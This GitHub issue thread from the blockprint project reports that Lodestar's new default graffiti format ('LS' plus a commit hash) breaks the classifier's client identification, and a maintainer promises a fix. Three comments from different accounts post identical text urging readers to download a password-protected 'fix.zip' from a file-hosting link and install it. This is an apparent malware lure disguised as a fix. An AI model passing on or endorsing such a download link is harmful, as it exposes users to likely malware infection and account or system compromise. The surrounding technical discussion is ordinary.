### ISSUE TITLE
Default graffiti for Lodestar update

### ISSUE THREAD

**Issue by philknows** [sigp/blockprint#36]
With the release of v1.21.0 on Lodestar, we've included the [new default graffiti format standard](https://github.com/ethereum/execution-apis/pull/517) to help better identify client pairs on mainnet via [PR 6753](https://github.com/ChainSafe/lodestar/pull/6753)

Most of our internal infrastructure has been updated and will now be identified in this format. Due to this update, the Blockprint API for clientdiversity.org is no longer picking up the [default graffiti of "Lodestar"](https://github.com/sigp/blockprint/blob/4c456438c619d2999a690b4b4e5a82c95a1fc304/classifier.py#L34-L35) and has completely fallen off the current estimates on the Blockprint API due to new default graffiti set as `LS{4-char-commit-hex}`

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by michaelsproul** [comment]
Nice catch! I'll try to get this done soon

Hopefully we'll also have a proper classifier online for Lodestar soon too. The Miga Labs crew have been working on a new ML algorithm for the backend that can do Lodestar & Grandine with high accuracy as well. I'm just waiting on them to send me the final model so I can roll it out
